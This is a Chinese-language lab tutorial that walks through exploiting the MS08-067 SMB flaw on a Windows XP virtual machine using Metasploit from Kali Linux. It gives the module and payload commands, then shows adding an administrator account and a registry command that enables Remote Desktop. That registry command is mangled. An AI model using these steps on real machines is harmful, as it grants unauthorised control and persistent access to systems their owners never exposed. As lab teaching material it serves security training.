kalilinux攻击漏洞MS08 067

在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境，   kalilinux：   winxp   要做的就是用Kali Linux里的Metasploit入侵WinXP

操作方法

（01）在Kali用命令  msfconsole 开启Metasploit  （在终端里输入msfconsole）

（02）然后运行命令：use exploit/windows/smb/ms08_067_netapi                #使用MS08067漏洞攻击程序

（03）set LHOST                                                         #设置本地主机IP

（04）set RHOST                                                      #设置目标主机IP

（05）set payload windows/shell_bind_tcp                                   #设置payload

（06）show options    #查看设置信息

（07）exploit         #实施攻击

（08）攻击成功，我们得到了一个cmdshell，接下来就是新建账户了。

（09）添加用户名为zeal，密码为zeal的用户，并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况

（10）发现并没有开启3389（远程桌面连接端口），我们需要手动开启。需要执行命令：REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

（11）有了目标主机的cmdshell你想做什么不行吧？

（12）好了演示到此完毕！

特别提示

不要随便攻击别人，漏洞基本都修复了。

命令注意大小写

目标的winxp最好是英文的